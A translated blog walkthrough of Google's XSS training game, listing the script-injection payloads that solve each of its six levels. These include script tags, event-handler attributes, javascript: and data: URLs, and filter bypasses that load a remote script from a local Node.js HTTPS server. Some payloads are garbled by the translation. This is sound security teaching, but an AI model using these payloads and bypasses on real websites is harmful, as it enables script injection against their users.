Google XSS games

Hi friends, this article mainly describes how to play the XSS vulnerability game released by Google a few days ago. The address is here.
In this article, I will list some interesting methods found on the network, including all levels. Let's just get started!
Level 1: Hello, world of XSS
Okay, this is simple. There is nothing to say:
<Script> alert (1); </script>Level 2: Persistence is key
The following methods can be used to determine the level:
<A href = "test" onclick = "javascript: alert (1);"> test </a> creates a link (interaction with the user)
load an invalid image (using onerror)-No interaction is required.
load a valid image (using onload)-No interaction is required.
Level 3: That sinking feeling...
The window. location. hash javascript attribute is used for the images loaded on the page.
Therefore, we can use the following method:
1.jpg 'onload = 'javascript: alert (1); 'loads a valid image (using onload)-No interaction is required.
Or:
'Onerror = "alert (1)"> load an invalid image (using onerror)-No interaction is required.
You can also use the script tag as follows:
'> <Script> alert (1); </script>Level 4: Context matters
Different methods are required for this issue:
1 ') % 3 Balert ('1 semicolon must be encoded; otherwise, it will be filtered out.
Single quotation marks may also be filtered out:
1% 27) % 3 balert (% 271 can also be used | logical operator:
1') | alert ('1 can also be used in the following method, without any encoding/operator:
1'); alert (1 );//Level 5: Breaking protocol
At this level, characters such as double quotation marks (") will be filtered. We only need to use:
Javascript: alert (1); after clicking the link, the alert warning box is displayed.
Level 6: Follow the rabbit
At the last level, we can use data: text/javascript as follows:
Data: text/javascript, alert (1); regular expressions are also case sensitive, so we can use "HTTP" instead of "http", and then load the remote script in the following way:
HTTP: // 127.0.0.1: 8000 or add a space at the beginning of the URL:
[Space] http: // 127.0.0.1: 8000 the homepage must contain some javascript scripts such as alert (1.
I have seen that some people cannot load some HTTP scripts on the network, because they use the HTTPS version. In this case, you can create a simple HTTPS server by yourself (such as using Node. js ).

var https = require('https');var fs = require('fs'); var hskey = fs.readFileSync('server.key');var hscert = fs.readFileSync('server.crt') var options = {    key: hskey,    cert: hscert}; https.createServer(options, function (req, res){    res.writeHead(200);    res.end("alert(1);");}).listen(8000);

Use Node. js to implement simple HTTPS servers
In both cases, you can use the following code to bypass Filtering:
// Configure.
For example, if you are running your own HTTPS server, you can inject the following code:
// 127.0.0.1: 8000Done.
Hope that the readers who have read this article will gain some benefits. This game is quite interesting and looks forward to its subsequent works.
Address: http://paulsec.github.io/blog/2014/06/02/diving-into-xss-googles-game/